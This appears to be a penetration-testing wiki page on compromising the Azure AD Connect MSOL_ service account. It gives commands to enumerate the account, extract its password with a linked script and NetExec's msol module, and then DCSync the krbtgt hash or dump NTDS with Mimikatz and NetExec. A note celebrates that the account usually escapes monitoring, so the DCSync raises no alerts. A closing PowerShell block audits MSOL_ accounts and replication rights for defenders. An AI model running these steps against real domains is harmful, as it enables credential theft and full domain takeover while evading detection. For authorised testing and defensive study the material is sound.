# MSOL (Microsoft Online Services) account

{% embed url="<https://www.tevora.com/threat-blog/targeting-msol-accounts-to-compromise-internal-networks/>" %}

## Brute force

{% embed url="<https://github.com/dafthack/MSOLSpray>" %}

{% content-ref url="../../brute-force/o365-bruteforce" %}
[o365-bruteforce](https://0xss0rz.gitbook.io/0xss0rz/pentest/brute-force/o365-bruteforce)
{% endcontent-ref %}

## Enumerate the PHS (Password Hash Sync) account and the server where AD Connect is installed

```powershell
# PowerView: AD Connect creates a service account named MSOL_<installation id>
Get-DomainUser -Identity "MSOL_*" -Domain domain.local

# AD module: the Description attribute records the computer AD Connect was installed on
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Server domain.local -Properties * | select SamAccountName,Description | fl
```

## Extract MSOL credentials

{% hint style="warning" %}
*Administrative privileges needed*
{% endhint %}

{% embed url="<https://blog.xpnsec.com/azuread-connect-for-redteam/>" %}

{% embed url="<https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545#file-azuread_decrypt_msol-ps1>" %}

```powershell
.\adconnect.ps1
```

With the recovered password, start a network-only logon as the MSOL\_ account:

```powershell
runas /user:domain.local\MSOL_16fb75d0227d /netonly cmd
```

### DCSync

{% hint style="success" %}
*Because AD Connect synchronizes password hashes every two minutes, in an enterprise environment the MSOL\_ account is typically excluded from tools like MDI. This allows us to run DCSync without triggering any alerts.* 🥳
{% endhint %}

```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local"'
```

{% content-ref url="../../internal-pentest/dcsync" %}
[dcsync](https://0xss0rz.gitbook.io/0xss0rz/pentest/internal-pentest/dcsync)
{% endcontent-ref %}

## NXC (NetExec)


```bash
nxc ldap [IP] -u username -p password -M entra-id
```

Extract the MSOL credentials from the AD Connect server (local administrator on that host is required):

```bash
nxc smb 10.0.0.8 -u admin01 -p '<-SNIP->' --local-auth -M msol
```

The MSOL account can perform a **DCSync** because it holds the **Replicating Directory Changes All** permission on the domain.

```bash
nxc smb 10.0.0.4 -u MSOL_80541c18ebaa -p '<-SNIP->' --ntds
```
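As a defensive check covering both the MSOL\_ enumeration above and the replication permission just described, the following PowerShell is an added example (not from the original page or the linked tools); it assumes the ActiveDirectory module and domain read access, lists the MSOL\_ accounts with the AD Connect server named in their description, and audits which principals hold the extended rights that make DCSync possible (the GUIDs are the documented replication extended-right identifiers).

```powershell
# Added example: audit MSOL_ accounts and replication rights on the domain head.
# Assumes the ActiveDirectory module and a domain-joined host with read access.
Import-Module ActiveDirectory

# Documented extended-right GUIDs; together they allow a DCSync-style replication request.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

$Domain   = Get-ADDomain
$DomainDN = $Domain.DistinguishedName

# 1. Every MSOL_ account; AD Connect records the sync server name in the Description attribute.
Write-Host "== MSOL_ accounts in $($Domain.DNSRoot) =="
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Properties Description, Enabled, PasswordLastSet |
    Select-Object SamAccountName, Enabled, PasswordLastSet, Description |
    Format-Table -AutoSize

# 2. Every Allow ACE on the domain head that grants one of the replication extended rights.
Write-Host "== Principals holding replication rights on $DomainDN =="
$acl = Get-Acl -Path "AD:\$DomainDN"
$holders = foreach ($ace in $acl.Access) {
    $guid = $ace.ObjectType.ToString()
    if ($ace.AccessControlType -eq 'Allow' -and $ReplicationRights.ContainsKey($guid)) {
        [pscustomobject]@{
            Principal = $ace.IdentityReference.Value
            Right     = $ReplicationRights[$guid]
            Inherited = $ace.IsInherited
        }
    }
}
$holders | Sort-Object Principal, Right | Format-Table -AutoSize

# 3. Flag MSOL_ holders explicitly: the right is expected for PHS, but the account must stay
#    in scope for replication monitoring rather than being allow-listed as "known noise".
$holders | Where-Object { $_.Principal -like '*\MSOL_*' } | ForEach-Object {
    Write-Warning "$($_.Principal) holds $($_.Right): confirm replication requests from it are monitored"
}
```

Principals granted GenericAll on the domain head also satisfy the replication check without an explicit extended-right ACE, so review those separately.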

{% embed url="<https://www.rayanle.cat/lehack-2024-netexec-workshop-writeup/>" %}
